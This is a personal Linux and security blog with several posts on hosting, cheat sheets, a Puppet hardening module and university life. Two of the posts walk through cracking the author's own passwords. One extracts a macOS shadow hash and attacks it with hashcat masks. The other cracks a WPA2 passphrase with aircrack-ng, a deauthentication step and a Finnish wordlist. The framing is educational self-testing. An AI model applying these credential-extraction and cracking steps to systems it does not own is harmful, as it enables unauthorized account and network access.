The next thing I would like to do is build a surveillance camera from a Raspberry Pi and get photos via SMS (hopefully this means there will be a part 3 :).

Conclusion

To get this to work you will need to have:

  • A Linux server with Apache and PHP
  • An account at twilio.com
  • A number purchased from twilio.com
  • The PHP script on your Linux server (and a URL to it)
  • The URL set in the twilio.com number's settings

More information: https://www.twilio.com/docs
sms-control.php on GitHub: https://github.com/RakField/control-linux-sms

If you would like to get some more information, please head to: http://www.haaga-helia.fi/fi/hakijalle

This post is made in cooperation with Haaga-Helia University of Applied Sciences.

What kind of University is Haaga-Helia

March 17, 2015

Introduction

I am going to briefly go over the different university options in Helsinki and especially write about Haaga-Helia, which is my weapon of choice.

In the middle of summer 2013 I started exploring different options of where to go and what to do in the future. I was 24 years old and I realized I would like to study ICT. The journey to that point was long and bumpy but very instructive. Soon I noticed that there was going to be one more hard decision to make: at which university would I like to study?

Universities in Helsinki

First of all there is the University of Helsinki. It is the university where Linus Torvalds studied. Then there are the universities of applied sciences: Haaga-Helia, Laurea and Metropolia. All four schools offer ICT courses.

When I went through the options I found that Haaga-Helia is the only university whose main focus is to serve companies' demands. It is not just a nice promise; it really shows in the course selection. For me the most interesting courses are the ones relating to programming, software development, Linux and business, and there are lots of them. It has been a year since I started my studies and it still feels like Haaga-Helia is what I was looking for.

Haaga-Helia's entrance exam

The exam day was full of electricity. There is a massive lobby at Pasila's campus, which was flooded with curious IT-minded people. I was really impressed by the fancy building and the people. At the very first moment when I felt the atmosphere in Haaga-Helia I knew that this was the place where I would rather be.

There was no advance material for the exam. The first part was mostly basic reasoning and pseudocode-style programming. The second part was related to bitcoins. We had to read an article written by Petteri Järvinen and had about 30 minutes for reading it. I was very excited about what I was reading. After that we had to hand back the article and got a paper with questions related to it.

View of Haaga-Helia's lobby

Orientation

The good news arrived and I got in. ICT studies start twice a year; I started in January. The first week was dedicated to get-together activities. The first day was just basic lessons in an auditorium. Something very positive was that tutors played a big role during those days. It feels natural to get tips from other students who have been there for a while and already completed some studies.

Student union Helga

In those first days it became very clear that Haaga-Helia has a very lively student union called Helga. They organize lots of events and it feels like there is something going on every week. On the campus they have a nice lounge in the basement. It is a comfortable place to socialize, eat snacks, hang out or just take a nap between courses.

Helga point at Haaga-Helia Pasila

Course selection

I am studying Business Information Technology. I think it is a very practical programme. Courses are chosen in the spirit of what every ICT person should know, plus courses which support that knowledge. For example, in the first period we had these two courses: Workstations and Networks, and Business Operations and Environment. The first course was pure ICT, and our teacher Juhani Merilinna turned out to be a true professional when it comes to Linux and Windows. We learnt the basics of how to configure workstations and how to build a network. The second course, Business Operations and Environment, was more like an introduction to the business world. Its purpose was to show the frame in which we are going to work. To be honest, so far there has not been a single course whose purpose I have not been able to see.

Before every period students have to enroll in courses. It is totally up to you what you would like to study and when. Of course there are some limits, but not many. There is a planned schedule, which shows the optimal order. Some courses have dependencies: courses which have to be completed before enrolling. But basically enrolling in courses is very flexible. I have already completed many courses which are scheduled for the sixth or seventh period, and I am currently in my third period. For example, I did the Linux as a server course in the first period, and it had the Workstations and Networks course as a dependency. I asked the teacher if I could try to complete it even though I had not completed the dependencies yet, and it was all right. When the course ended I got excellent grades.

Studying

After enrolling in the courses, the hard part starts. Well, actually it is not that hard. Studying at Haaga-Helia is quite fun, I think. A short list of things that I like:

  • Timetables are flexible
  • The cafeteria and canteen serve delicious and cheap refreshments
  • Other students are nice and polite
  • The library is a nice place to work
  • Pasila's building is awesome

Here is my timetable at the moment. It is quite nice: not too long days and only one early wake-up. Of course this is just one timetable (it changes 4 times a year), but they have all been very similar.

my-timetable

Of course we have tasks to complete outside of classes. But still, it is not too much that we have to do.

Conclusion

I think I made the best possible choice when I decided to go to Haaga-Helia. I have not been anywhere else, but I have no bad things to say about Haaga-Helia, so I cannot imagine what could be better at other universities. If I had to choose again I would still go to Haaga-Helia. I love the atmosphere and the way the teachers organize their courses. In fact I've heard from teachers that they like being there as well. If everything goes well on their courses, they have the power to do what they feel is best.

If you would like to get some more information, please head to: http://www.haaga-helia.fi/fi/hakijalle

This post is made in cooperation with Haaga-Helia University of Applied Sciences.

HTML5 cheat sheet

March 3, 2015

Just a simple HTML5 document

Sometimes it is very frustrating when you are starting a new project and you cannot remember how to include JavaScript files or how to write a comment in HTML5. Of course you can find out, but if it takes more than a minute it is kind of annoying when you just want to do something quick.

Live demo!

 

[html]<!doctype html>
<html lang="en">
<head>
    <title>HTML5 document</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="This is about to tell something important">
    <meta name="keywords" content="keyword1, keyword2, keyword3">
    <meta name="author" content="Tuukka Merilainen">

    <!--An example of a comment-->
    <link rel="stylesheet" href="style.css">
    <script src="jquery-1.11.2.min.js"></script>

</head>
    <body>
        <main>
          <article>
            <header>
              <h1>This is HTML5 document </h1>
              <p>
                  UTF-8 encoded and written in english.
              </p>
              <img alt="HTML5 logo" src="html5-logo.png">
            </header>
          </article>
        </main>
    </body>
</html>[/html]

Write valid code and make it accessible

Remember to scan your documents with these two validators (the first for markup, the second for accessibility):

http://validator.w3.org/
http://achecker.ca/checker/index.php

Sources:

https://github.com/bendc/frontend-guidelines

How to crack macbook admin password

January 20, 2015

pirate tux penguinIntroduction

I have been worried about security for a long time. When you read typical articles about security you will almost always face a paragraph telling you that it is very important to have a good password. Last time I tested how easy/hard it is to crack my WPA2-secured WLAN with a weak password. I am now going to crack my MacBook Pro, which is running OS X Mavericks.

Starting point

I have actually learned something in the past few months and I have a very strong password at the moment. For this test I changed it to something which I feel is closer to the passwords users normally have. I changed the password to: Laisk489. It is a Finnish word meaning lazy, with a little bit of leetspeak, and it passes Apple's password policy.

Like in the router article, I did not have any previous experience with cracking OS X passwords, so Google was my friend again. Not many searches later I found a very decent article, “How to Extract OS X Mavericks Password Hash for Cracking With Hashcat”. It is a step-by-step guide to exactly what I was looking for. Perfect!

There are methods to obtain the password hash (the password protected with a mathematical algorithm) even when you are unable to log into any account on the machine. I am not so interested in that, since I just want to test how weak my own password is, so I skipped that part. After reading the article I knew that the password hash in Mavericks is located at this path: /var/db/dslocal/nodes/Default/users/<user>.plist.

Getting the hash

I opened a terminal on my Mac and tried to access /var/db/dslocal/nodes/Default/users.

$ cd /var/db/dslocal/nodes/Default/users
-bash: cd: /var/db/dslocal/nodes/Default/users: Permission denied
$ ls /var/db/dslocal/nodes/Default/users
ls: /var/db/dslocal/nodes/Default/users: Permission denied

It did not work because I did not have permissions for that folder. I had to sudo.

$ sudo ls /var/db/dslocal/nodes/Default/users
There it was: tuukka.plist
I copied it to my desktop:
$ sudo cp /var/db/dslocal/nodes/Default/users/tuukka.plist Desktop/tuukka.plist

 Extract the hash for hashcat

Now this part gets a little bit tricky, and I spent a couple of hours thinking about what is actually happening. In the end it is a very simple task: the hash is in binary format by default and we want to convert it into XML.

In the Mac's terminal I switched to the Desktop, created a folder for our mission and moved the hash into that folder:

$ cd
$ cd Desktop/
$ mkdir password-crack
$ mv tuukka.plist password-crack/
$ cd password-crack/

To convert the hash I used following:

$ sudo plutil -convert xml1 tuukka.plist

After that I opened the hash with

$ sudo nano tuukka.plist

And there was lots of stuff in it. The line I was looking for was under “ShadowHashData”, surrounded by <data></data> tags. I copied that data to the clipboard with cmd+c and pasted it into the Sublime Text editor. I removed the line breaks and put everything on one line: just hit delete like a hundred times while taking care that no letters were deleted.

password-crack-sublime

After the line-break marathon I copy-pasted it into the terminal and did this:

$ sudo echo "YnBsaXN0MDDRAQJfEBRTQUxURUQtU0hBNTEyLVBCS0RGMtMDB
AUGBwhXZW50cm9weVRzYWx0Wml0ZXJhdGlvbnNPEIBWEto5iOf1chpuN/HDsV3iP3s
IjhFoXbrG2/5fPhBRgz9v8CDd/PlyONacUDcQrWFSAvEew1gKMwEP9haGH8sFA1jT9
kmFyFh0kpk+8dN1FdAZJxiP3K3QbRj+owIWZxMTYoMmkRh5ZrnxVqDb5zvGA5443
O1yV4DovhT6SuLrL08QIDOAL/Y5nd9PcXEBDAzO+N+6fNc5wvxGslginwn9iLDJEYi
VCAsiKTE2QcTnAAAAAAAAAQEAAAAAAAAACQAAAAAAAAAAAA
AAAAAAAOo=" | base64 -D > shadowhash
$ sudo file shadowhash
$ sudo plutil -convert xml1 shadowhash

The hash was now converted. I opened shadowhash with the nano editor, and there the data was separated under the tags entropy, iterations and salt. As said in the guide, entropy and salt were still in base64 format and needed to be converted again.

entropy-salt

Like before, I first copied the entropy data to the clipboard and then pasted it into Sublime Text, where I removed the line breaks and put the data on one line. After that I did the following:

$ sudo echo "VhLaOYjn9XIabjfxw7Fd4j97CI4RaF26xtv+Xz4QUYM/b/Ag3fz5cjjWnFA3EK1hUgLxHsNYCjMBD/YWhh/LBQNY0/ZJhchYdJKZPvHTdRXQGScYj9yt0G0Y/qMCFmcTE2KDJpEYeWa58Vag2+c7xgOeONztcleA6L4U+kri6y8=" | base64 -D > entropy
$ sudo file entropy
$ sudo xxd entropy

There it was: the entropy data converted to hex values. Once more I had to copy and paste the values from the terminal into Sublime Text and remove the spaces. This time there was some data to be deleted; the hex values are the ones in the middle, as highlighted in this screenshot:

hex-values

The hex data required some fine-tuning. I copied the whole thing to the clipboard and pasted it into Sublime Text, then removed the “useless” part and the spaces, and it looked like this:

entropy-hex
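Incidentally, the whole copy-paste-and-clean-up round can be collapsed into one pipeline: xxd's plain mode (-p) prints bare hex with no offsets or ASCII column. A sketch with a short dummy string standing in for the real entropy blob (note: macOS base64 decodes with -D, GNU coreutils with -d):

```shell
# Dummy base64 data standing in for the entropy blob.
b64="aGVsbG8gd29ybGQ="
# Decode and print the bytes as one continuous hex string.
hex=$(echo "$b64" | base64 -d | xxd -p | tr -d '\n')
echo "$hex"
```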

I repeated the same process for the salt hash.

$ sudo echo "M4Av9jmd309xcQEMDM7437p81znC/EayWCKfCf2IsMk=" | base64 -D > salt
$ sudo file salt
$ sudo xxd salt

And then the copy-paste-remove-spaces operation again…

The annoying part was almost over. The last thing to do was to combine all those hex values for hashcat, which I used for the actual cracking. Hashcat requires the data in this kind of format:
$ml$<iterations>$<salt>$<entropy>
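Pasting the pieces together in Sublime works, but the same assembly can be done with printf (the three values below are dummies, not my real hash):

```shell
# Dummy pieces; the real ones come from the converted plist.
iterations=23923
salt=deadbeef
entropy=cafebabe
# Single quotes keep the literal $ml$ prefix from being expanded by the shell.
line=$(printf '$ml$%s$%s$%s' "$iterations" "$salt" "$entropy")
echo "$line"
```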

Here is what I did in one screenshot (click for bigger size):

finally-ready-for-hashcat
Please note that everything is on the same line; word wrap is just turned on in Sublime Text!

Crack with hashcat

For the cracking I am using my mid-2012 13″ MacBook Pro with a 2.9GHz i7.

Alright, everything was prepared and ready for hashcat. At this point the guide got a little bit tricky and led to a dictionary attack. It was obviously something that did not fit my needs, and I started googling. Actually I am very happy that the original guide was a little bit tricky and led me to Google: I found this particularly fine blog about all kinds of goodness: http://www.unix-ninja.com/. And it also had a very nice guide about hashcat.

I thought that brute force was something I would like to use, but unix-ninja taught me something new: brute force with masks. Basically a mask is a pattern for the cracking software (hashcat in this case) which encodes some facts we already know about the password. For example, if you know that the password starts with an uppercase letter, the last three characters are numbers and it is 8 characters long, you can actually tell that to hashcat. With that kind of information hashcat is able to crack the hash far faster than without any foreknowledge.

Now let me take a self… No, not that. I needed hashcat, so I downloaded it from here: http://hashcat.net/hashcat/. It went to my Downloads folder, which I opened in Finder. The file was compressed and I extracted it by clicking on it (with The Unarchiver).

After that I opened a new terminal, went to the folder I had just extracted and put the hash in it:
$ cd
$ cd Downloads/hashcat-0.49
$ nano laiska.hash
Copy pasted the hash I made earlier and saved.

Everything was ready for the cracking: I had hashcat, I had the hash prepared for it and I had the mask. No, wait, I did not have a mask yet. As I said earlier, my password was Laisk489: starting with an uppercase letter, last three characters are numbers, and 8 characters long in total. I needed a mask for that. I found an almost-right pattern for me from unix-ninja, made some small changes, and here is the result:

?u?l?l?l?l?d?d?d

It encodes this information about the password: it starts with an uppercase letter, the last three characters are numbers, and it is 8 characters long in total.
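A quick sanity check of why masks help: the keyspace for this mask is 26 × 26⁴ × 10³ candidates, far fewer than trying every 8-character string. Computed in shell:

```shell
# ?u -> 26 choices; ?l -> 26 each (four of them); ?d -> 10 each (three of them)
keyspace=$((26 * 26*26*26*26 * 10*10*10))
echo "$keyspace"
```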

I started cracking with this command:

$ ./hashcat-cli64.app -m 7100 -a3 laiska.hash ?u?l?l?l?l?d?d?d
-m 7100 is the mode for cracking OS X v10.8/v10.9 passwords
-a3 stands for brute force
laiska.hash contains my hash
and the last part is the mask
More info in the hashcat manual.

hashcat-cracking

Many hours later I decided to stop cracking. It was just taking too long. At stage five the estimated time was over 3 days, as you can see:

cracking-takes-too-long

Did the hash work/contain the right info?

I wanted to make sure that my hash was working. I made a wordlist.txt file in the hashcat directory and put a couple of words in it, including my password Laisk489. I ran hashcat's dictionary attack and it did break the hash, finding that the password was Laisk489.

$ ./hashcat-cli64.app -m 7100 laiska.hash wordlist.txt

After the execution completed I found the results in the file hashcat.pot. There was my password, Laisk489.

Conclusion

Well, it seems my skills were a little bit inadequate. It was still a very interesting and educational project. I might continue from this point later with a new strategy and try to use a modified version of the wordlist which I used in the router guide. I was surprised that it takes that long to break a password with a mask even when it is no more than 8 characters. Of course the method was still brute force, my hardware is not that good, and yes, I was just using one laptop. Serious attackers might have bigger weapons. :p Which means that I am still going to use much more complex passwords than Laisk489 in the future.

If time is not a problem, or the password is, for example, only 4 or 5 characters, these methods might be a good shot.

Sources

https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/
http://www.unix-ninja.com/p/Exploiting_masks_in_Hashcat_for_fun_and_profit/
http://hashcat.net/wiki/doku.php?id=oclhashcat

 

Puppet module which secures your Ubuntu/Debian

January 8, 2015

bridge2 at tuukkamerilainen.com

For those who just want this module head to: https://github.com/RakField/puppet-secure-like-linode

Introduction

For the past year I have gone through the configurations in Linode's Securing Your Server guide so many times. Finally I decided to make a Puppet module to automate the process.

Alright, you might have heard about Puppet already; if not, you probably should have. I have been playing with it for a couple of months and I love it already. It is exactly what I have been looking for: it just makes life easier. Once you have configured something, you can do it again in minutes! :]

Puppet is open source configuration management software. Basically you write a script in the Puppet language which describes your needs. For example, say you would like to install Apache with PHP5 and some virtual hosts: you just write the script and Puppet will do the installation. It can also be set up in a master-node fashion, where one machine acts as the puppetmaster and the others are clients which request catalogs from the master.
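For a flavour of the language, a minimal (hypothetical) manifest for the Apache-with-PHP example above might look like this; resource and package names are assumptions for Ubuntu/Debian, not part of my module:

```puppet
# Hypothetical sketch: install Apache and PHP5 and keep the service running.
package { ['apache2', 'php5']:
  ensure => installed,
}

service { 'apache2':
  ensure  => running,
  enable  => true,
  require => Package['apache2'],
}
```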

 

Module details

So I wanted to make module to automate steps from this guide: https://www.linode.com/docs/security/securing-your-server

  1. Add user for administration
  2. Use SSH key pair authentication
  3. Disable SSH Password Authentication and Root Login
  4. Create a firewall
  5. Install fail2ban

This module is tested on Ubuntu 14.04 LTS and Debian 7.6.

 

Structure

|-- secure
|   |-- files
|   |   |-- authorized_keys
|   |   |-- iptables.firewall.rules
|   |   `-- sshd_config
|   |-- lib
|   |   `-- puppet
|   |       `-- parser
|   |           `-- functions
|   |               `-- pw_hash.rb
|   `-- manifests
|       |-- fail2ban.pp
|       |-- firewall.pp
|       |-- init.pp
|       `-- ssh.pp

Operating principle

All configurations are made by placing configuration files in specific places. For example, the module first installs the OpenSSH server and then replaces the original sshd_config file with a modified version. If you would like to make changes to the OpenSSH server configuration or the firewall, you should modify the files under secure/files.
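The file-drop pattern described above can be sketched as a simplified Puppet resource chain (a hypothetical illustration; the module's actual manifests live under secure/manifests):

```puppet
# Sketch: install OpenSSH, then overwrite its config from the module's files/ dir.
package { 'openssh-server':
  ensure => installed,
}

file { '/etc/ssh/sshd_config':
  ensure  => file,
  source  => 'puppet:///modules/secure/sshd_config',
  require => Package['openssh-server'],
  notify  => Service['ssh'],   # restart sshd when the config changes
}

service { 'ssh':
  ensure => running,
}
```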

 

Usage

It works almost out of the box. The first thing to do is replace the authorized_keys file's content with your own RSA key. To use the module it is required to define the user and system variables. This can be done in site.pp:

Example:
adminuser {'username': usr_pw => 'userpassword', }
Exec { path => [ "/bin/", "/sbin/" , "/usr/bin/", "/usr/sbin/" ] }

 

Investigate and download the module

https://github.com/RakField/puppet-secure-like-linode

 

Sources

pschyska. PW hashing with puppet parser function. URL: https://gist.github.com/pschyska/26002d5f8ee0da2a9ea0
Linode. Securing Your Server. URL: https://www.linode.com/docs/security/securing-your-server

Linux cheat sheet

December 21, 2014

Introduction

Some things are just hard to remember. A nasty moment comes when you have to do something but you just do not remember the right order. These are my weak points. All tested on Ubuntu 14.04 LTS.

 

Miscellaneous

tar: create – full backup of /, don't tar /mnt

$ sudo tar -cvpzf backup.tar.gz --exclude=/mnt /

tar: extract – backup extracted to /recover folder

$ sudo tar -xvpzf backup.tar.gz -C /recover
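A quick way to sanity-check the create/extract pair together on a scratch directory (no sudo needed when everything lives under mktemp; paths here are throwaway examples):

```shell
# Create a tiny tree, back it up, restore it elsewhere, and verify the content.
tmp=$(mktemp -d)
mkdir -p "$tmp/src" "$tmp/recover"
echo "hello" > "$tmp/src/file.txt"
tar -cpzf "$tmp/backup.tar.gz" -C "$tmp" src
tar -xpzf "$tmp/backup.tar.gz" -C "$tmp/recover"
restored=$(cat "$tmp/recover/src/file.txt")
echo "$restored"
rm -rf "$tmp"
```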

 

Edit crontabs

$ crontab -e

 

rsync
todo

 

grep: find out how to enable php scripts in user directories with apache

$ sudo grep -r 'user directories' /etc/apache2/*

Iptables stuff

iptables accept or drop all

$ sudo iptables -P INPUT ACCEPT   # or DROP

iptables list rules fast

$ sudo iptables -L -n

iptables flush rules

$ sudo iptables -F

iptables accept by port

$ sudo iptables -I INPUT -s 0.0.0.0/0 -p tcp --dport 80 -j ACCEPT

iptables accept by ip

$ sudo iptables -I INPUT -s 172.28.0.0/255.255.0.0 -j ACCEPT

Iptables stateful firewall

$ sudo iptables -I INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

 

show the PATH environment variable

$ echo $PATH

 

Give sudo

$ usermod -a -G sudo exampleuser

 

ssh-keypair on serverside

$ ssh-keygen //follow steps
$ mv id_rsa.pub .ssh/authorized_keys
$ chown -R example_user:example_user .ssh
$ chmod 700 .ssh
$ chmod 600 .ssh/authorized_keys
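The same steps can be scripted non-interactively for testing, here against a scratch directory instead of a real home (assumes ssh-keygen is installed):

```shell
# Generate a key pair without prompts, install the public half, lock down perms.
tmp=$(mktemp -d)
ssh-keygen -q -t rsa -N "" -f "$tmp/id_rsa"
mkdir -p "$tmp/.ssh"
mv "$tmp/id_rsa.pub" "$tmp/.ssh/authorized_keys"
chmod 700 "$tmp/.ssh"
chmod 600 "$tmp/.ssh/authorized_keys"
installed=$(ls "$tmp/.ssh")
echo "$installed"
rm -rf "$tmp"
```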

 

Puppet: test catalog on node without applying changes

$ sudo puppet agent --test --noop

 

perl: warning: Please check that your locale settings FIX

$ export LC_ALL="en_US.UTF-8"

Send email from shell

$ echo 'message' | mail -s "subject" -a "From: yourname@example.com" -A example-attachment receiveremail@example.com

mysql (create database, user and grant privileges)

CREATE DATABASE dbname;

USE dbname;

GRANT ALL ON dbname.* TO 'dbuser'@'localhost' IDENTIFIED BY 'password';

FLUSH PRIVILEGES;

 

References

Eli The Computer Guy tar backup

Linode Securing Your Server

 

Self made theme, finally

October 6, 2014

new-theme-both

 
It's over 6 months since I started writing this blog. The first posts were written on wordpress.com. Quite soon I wanted to host my blog myself, and tuukkamerilainen.com was born.

I was so into the Linux and VPS world that I did not want to waste time on making a theme. I picked the BizzCard theme by ThemeZee. Actually it fit my needs quite well, and within months I started to like it more and more.

Since I like to learn and make everything by myself (especially if it's not related to Microsoft), I have dreamed about a self-made theme. A couple of days ago I got a great vision of what kind of theme I would like to have, and here is the result. There are still lots of things to fix and build, but let this be version 1.0.

How I host tuukkamerilainen.com with VPS

September 29, 2014

14929298997_ac65103bcc_k

If you would like to know how stuff works, learn something new and have full control, a VPS is the absolute solution for you.

Contents of this post:
Introduction
How this site is hosted
What else I am hosting
Is it like expensive
Conclusion
References

Introduction

Let's talk some basics first. A virtual private server, i.e. a VPS, is a virtualized server on a physical server. You lease the virtualized server, and the cost depends on how many resources you need. For example, my VPS (which is hosting this website) has 2GB of RAM, 2 CPU cores and 48GB of disk space. My server costs $20 per month.

According to Chris Wiegman, hosting has gone through a huge evolution. Wiegman reports that “in the mid-90s about the only services available to the masses to host a website fell along the lines of GeoCities”. Comparing that to the present, I can't see any similarities. Wiegman mentions that there are 4 main types of hosting: shared hosting, VPS hosting, dedicated hosting and cloud hosting. All four have their own strengths and weaknesses.

My passion for Linux has led me to the point where I want to build everything myself rather than buying preconfigured solutions. So my decision for hosting is a VPS. I am going to explain how I make use of it: what kind of server I have and what daemons are required.

How this site is hosted

I have a VPS hosted by Linode. On that server I am running the Ubuntu 14.04 LTS Linux distribution. I have made some security configurations, installed Apache, MySQL & PHP and WordPress. Finally I have made some DNS-related configurations.

  1. Leased VPS from linode.com
  2. Chose Ubuntu as the operating system
  3. Some security configurations made to Ubuntu (there is nice guide to this on linodes docs)
  4. Apache, mysql and php installed (awesome guide nowhere else than in linodes docs)
  5. WordPress installed (my own guide to wordpress install)
  6. DNS settings made with Linodes DNS manager for tuukkamerilainen.com domain (my own guide to .tk domain and Linodes DNS manager)
  7. Virtual host configurations made to apache for tuukkamerilainen.com domain (my own guide to virtual hosts)

What else I am hosting

There is lots of other cool stuff you can host and use. With just a LAMP stack you can run useful services like Tiny Tiny RSS and ownCloud. At the moment I am also running a mail server, which means that mails sent to contact@tuukkamerilainen.com are actually handled by my own server. That is really cool stuff. It took some time to make the mail server happen, but it was worth it.

  • Mail server (surprise surprise there is brilliant stuff on linodes docs)
  • TinyTinyRss reader (nice way to read news everyday)
  • Owncloud (similar to dropbox)
  • Backup solutions for personal use
  • rakfield.com (my disc jockey site)

Is it like expensive?

It is not. I am paying $20 per month for my VPS and $20 per year for my domain. Actually I am paying a little bit too much, since Linode's cheapest solution costs $10 and it would fill my needs. I might downgrade in the future.

Conclusion

Let's say that you would like to have a web site, or a couple of them: just have them online and manage the content. You are not interested in technical aspects or tweaking the performance. Maybe you feel you are more valuable building awesome content for your blog than hacking with Linux. If all this sounds like you, go for web hosting/shared hosting. When discussing different hosting methods, Wiegman states:

In the end the type of hosting you pick depends on both your experience level and the number of visitors you plan on seeing at your site. The higher either one of those variables gets the more it will cost you. (Wiegman, C. 7.11.2011)

If you would like to know how stuff works and learn something new, or you just have very popular sites, a VPS is absolutely the solution for you. You might feel that $10 per month is too much to spend on a VPS since you might get a nice web hosting package for just $5 per month. In my opinion a VPS gives you so many opportunities compared to web hosting that those $10 are worth it.

References:

Chris Wiegman 7 Oct 2011.Shared Hosting vs VPS vs Cloud vs Dedicated Server. http://www.chriswiegman.com/2011/10/shared-hosting-vs-vps-vs-cloud-vs-dedicated-server/ Accessed 2.10.2014
https://www.linode.com/docs/security/securing-your-server/

https://www.linode.com/docs/websites/hosting-a-website/
https://www.linode.com/docs/email/postfix/email-with-postfix-dovecot-and-mysql

How I hacked router in 43seconds

April 7, 2014

penguin-161356_640

The usual Sunday morning: reading Hacker News, I found the title “How I hacked router”. The author had hacked his friend on request, and did it by hacking his router. After reading it I was loaded with curiosity. I wanted to try something similar, and I started to think about what my weak spot is. Not many thoughts later I realised that the most important thing I have is the backups of my music library, which are saved to a Time Capsule. Oh yes, the Time Capsule is a router, and I am going to hack it.

Starting point

The Time Capsule is located in a safe place at my home. Something not so safe was the WLAN password, which was a Finnish word: kultakala (goldfish in English), secured with WPA2. The most critical thing was that the router's admin password was exactly the same as the WLAN password. So if I could crack the WLAN password, I could easily delete all the backups on the Time Capsule. SICK!

Hacking the Time Capsule with Reaver

I had no previous experience at all with password cracking or "hacking-hacking", so I started by googling "how to crack WPA2". It led me to lifehacker.com's step-by-step article by Adam Pash on how to crack WPA2 with Reaver. Mr. Pash used the BackTrack Linux distro for cracking. At this point I remembered that BackTrack is the ultimate hacking distro and that its successor is Kali Linux.

I googled "crack wpa2 kali reaver" and found Secretlaboratory.org's guide. First I downloaded Kali Linux from the official website: I went with Kali Linux 1.0.6 64-bit and burned it to a DVD. Since I was going to crack WLAN, I needed Kali on a machine with a wireless network adapter. I decided to use my MacBook Pro, and it turned out that holding the Alt key on boot (DVD inserted) easily let me boot a live version of Kali.

I followed Secretlaboratory.org's step-by-step guide. At first it actually went quite well, but it failed very soon. I realised that Reaver is designed to crack access points with WPS (Wi-Fi Protected Setup). Basically it is an authorization system where the access point has a magic button; pushing the button lets you connect to the access point. The Time Capsule does not have this feature, which is actually very nice, since it makes it a little better secured. I had to figure out a new way to crack it.

Dictionary attack against the Time Capsule

After 20 minutes of googling I was much wiser again. It turned out that if you cannot exploit WPS, the only options are a brute-force or a dictionary-based attack. I decided to give the dictionary attack a try and found Drchaos.com's step-by-step guide to cracking WPA2 with Kali using a dictionary attack.

The guide was very easy to follow. In the last step, once you have captured the password hash and are going to crack it, you need a dictionary file: basically a file that contains words from a dictionary.
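For the record, this kind of dictionary attack boils down to a handful of aircrack-ng commands. The sketch below is from memory, not copied from the guide; the interface names, the capture file name and the <AP_MAC>/<channel> placeholders are assumptions you would fill in for your own network (and only your own network):

```shell
# Put the wireless card into monitor mode (creates e.g. mon0)
airmon-ng start wlan0
# Capture traffic from the target AP until a WPA handshake is recorded
airodump-ng --bssid <AP_MAC> -c <channel> -w capture mon0
# Optionally kick a client off so it re-authenticates and you catch the handshake
aireplay-ng --deauth 5 -a <AP_MAC> mon0
# Try every word in the dictionary file against the captured handshake
aircrack-ng -w words.finnish -b <AP_MAC> capture-01.cap
```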

At this point I started thinking: where the hell could I find a Finnish dictionary in one file? Well, at first I could not. I still googled "finnish dictionary attack" and BOOM, the second link led me to a site hosting a file called word.finnish containing 287698 Finnish words. I used that file and here is the result:

43seconds

I cracked my Time Capsule's password in 43 seconds. SICK!

Worst of all, after that I could have easily deleted all my backups, since I used the same admin password and WLAN password.
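As a rough sanity check of that 43 seconds: assuming a cracking rate of around 6,700 WPA2 keys per second (the rate itself is an assumption, a plausible figure for a laptop CPU of that era), exhausting the whole wordlist takes:

```shell
# 287,698 candidate passwords at an assumed ~6,700 WPA2 keys per second:
awk 'BEGIN { printf "%.0f seconds\n", 287698 / 6700 }'
```

Which lands right at the observed time; in the worst case the dictionary is only seconds of work, which is exactly why a single common word makes a terrible WPA2 passphrase.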

 

Sources:

http://disconnected.io/2014/03/18/how-i-hacked-your-router/

http://lifehacker.com/5873407/how-to-crack-a-wi-fi-networks-wpa-password-with-reaver/all

Crack WPA/WPA2 Wireless Password Using Reaver in Kali Linux!

http://www.drchaos.com/breaking-wpa2-psk-with-kali/

ftp://ftp.funet.fi/pub/unix/security/dictionaries/Finnish/

Threat news

April 1, 2014

434298567_cf0bd9dc55_o

This post is part of Petri Hirvonen's course: Security.

Mission

Explore news regarding security. Find one headline for each category listed below (not older than six months).

  1. Scams, social hacking
  2. Physical attacks
  3. Network, the use of threats (phishing)
  4. Denial-of-service attack

Social hacking

http://edition.cnn.com/2014/01/01/tech/social-media/snapchat-hack/

Hackers were able to capture millions of Snapchat accounts. The anonymous hackers said: "We used an exploit created by recent changes to the app, which lets users share photos or short videos that disappear after a few seconds."

Physical attacks

http://spectrum.ieee.org/energywise/energy/the-smarter-grid/attack-on-california-substation-fuels-grid-security-debate

At least one person entered the Metcalf substation and cut fiber cables. After that, one or more gunmen opened fire on the substation for nearly 20 minutes, knocking out 17 transformers, and then slipped away before police showed up.

Network, the use of threats (phishing)

http://www.cnet.com/how-to/spot-a-phishing-e-mail-in-2014/

The writer got an email related to his Apple ID. The sender claims that changes have been made to the account's credit card information and asks for confirmation. It turns out the message is not from Apple: just another hacker trying to get your personal information.

Denial-of-service attack

http://www.cnet.com/news/ddos-attack-is-launched-from-162000-wordpress-sites/

Hackers were able to take over more than 162,000 WordPress-powered sites and use them in a denial-of-service attack against another website.

 

 

Linux as server #7 – Apache benchmark, performance boost with Varnish (proxy) and yslow analysis

March 17, 2014

niagara-218591_1280

This post is part of Tero Karvinen's course: Linux as server. Even though it is related to a school assignment, it offers useful information about GNU/Linux!

Before the final test of the course, Mr. Karvinen introduced ways to improve server performance with a proxy. My last mission was:

  • Run Apache's load test (ab) against static and dynamic WordPress pages
  • Install Varnish, run the load test again and examine the results
  • Make .iso images bypass Varnish
  • Analyse pages with YSlow (Firefox add-on)

All tests made with Xubuntu 12.04 LTS Precise Pangolin 32bit.

Hardware:

  • Motherboard: Asus Z87-C
  • CPU: Intel Core i5-4670K 3.40GHz
  • RAM: 8GB DDR3 1600MHz
  • HDD: 120GB SSD Sata 3.0
  • GPU: Geforce GTX 560 Ti Phantom, 2GB GDDR5 (Gainward)
  • Asus cd/dvd

Preparing for benchmark test

First I needed two sites: a static and a dynamic one. I already had WordPress installed, so I decided to use that as the dynamic site. I opened the WordPress index page in Firefox, right-clicked on the page and chose "View Page Source". Now I had the source of a single WordPress page which I could use as the static page. I copied the source to the clipboard and went to the terminal.

$ cd
$ cd public_html/
$ mkdir static
$ cd static/
$ nano index.html
CTRL+v->CTRL+x->y->ENTER

Then I tested whether the pages looked the same:

$ firefox http://localhost/~tuukka/wordpress/
$ firefox http://localhost/~tuukka/static

Both pages looked exactly the same. What makes them different is that the page at http://localhost/~tuukka/wordpress/ is built from a MySQL database with PHP, HTML and CSS, while the static page contains just pure HTML and CSS.

Benchmark before varnish

I used Apache's own benchmark tool ab like this (-n 1000 requests in total, -c 150 of them concurrently):

$ ab -c 150 -n 1000 http://localhost/~tuukka/wordpress
